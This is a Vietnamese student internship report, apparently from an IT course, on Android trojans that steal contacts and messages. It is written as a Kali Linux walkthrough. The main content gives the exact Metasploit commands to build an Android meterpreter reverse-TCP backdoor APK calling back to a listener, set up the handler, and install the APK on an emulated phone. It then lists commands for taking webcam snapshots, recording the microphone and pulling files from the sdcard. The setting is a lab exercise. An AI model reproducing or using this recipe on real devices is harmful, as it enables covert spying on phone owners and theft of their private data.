Sinh viên thực hiện : NGUYỄN QUỐC VƯƠNG . Lớp CNTT . Ca sáng 3 – 5 - 7

Báo cáo thực tập

Đề tài 5 : Nghiên cứu các Trojan ,Malware cho phép đánh cắp dữ liệu như danh sách contact ,

tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài

NGHIÊN CỨU CƠ CHẾ TẠO MÃ ĐỘC TRÊN KALI LINUX

- Đầu tiên

, kiểm tra địa chỉ IP bằng : ifconfig

Địa chỉ IP : 192.168.1.14

- Khởi động terminal và gõ dòng lệnh sau:

Msfpayload android/meterpreter/reverse_tcp lhost=192.168.1.14 lport=8080 R >

/root/Desktop/test.apk

- Máy sẽ tạo 1 file .apk ở bên ngoài desktop , kiểm tra kích thước của file để chắc là file đã

tạo thành công

- Tiếp theo gõ lệnh : msfconsole

- Sau khi msfconsole load xong , ta tạo một handler để xử lí dữ liệu truyền về bằng cách gõ

lệnh sau:

Use exploit/multi/handler

Set payload/meterpreter/reverse_tcp

Set lhost 192.168.1.14 – Địa chỉ IP đã kiểm tra ban đầu

Set lport 8080 – nhập port giống với khi tạo payload ở trên

Exploit

- Sau đó màn hình sẽ hiện ra như bên dưới , lúc này đang chờ 1 máy android mở backdoor.

- Thử giả lập 1 điện thoại và tải file test.apk về và tiến hành cài đặt :

- Sau khi cài đặt hoàn tất thì việc kết nối với 1 android đã được thực hiện , lúc này ở console

xuất hiện :

- Ta có thể gõ lệnh help để biết được các lệnh :

- Có một số lệnh cơ bản như

Để xem thông tin máy : sysinfo

Để sử dụng camera: webcam_list (xem danh sách camera)

Webcam_snap x (sử dụng camera của android)

Để ghi âm : record_mic

Lấy file từ sdcard: cd/sdcard và ls (để xem danh sách thư mục,file)

cd/sdcard/download (để tải về máy )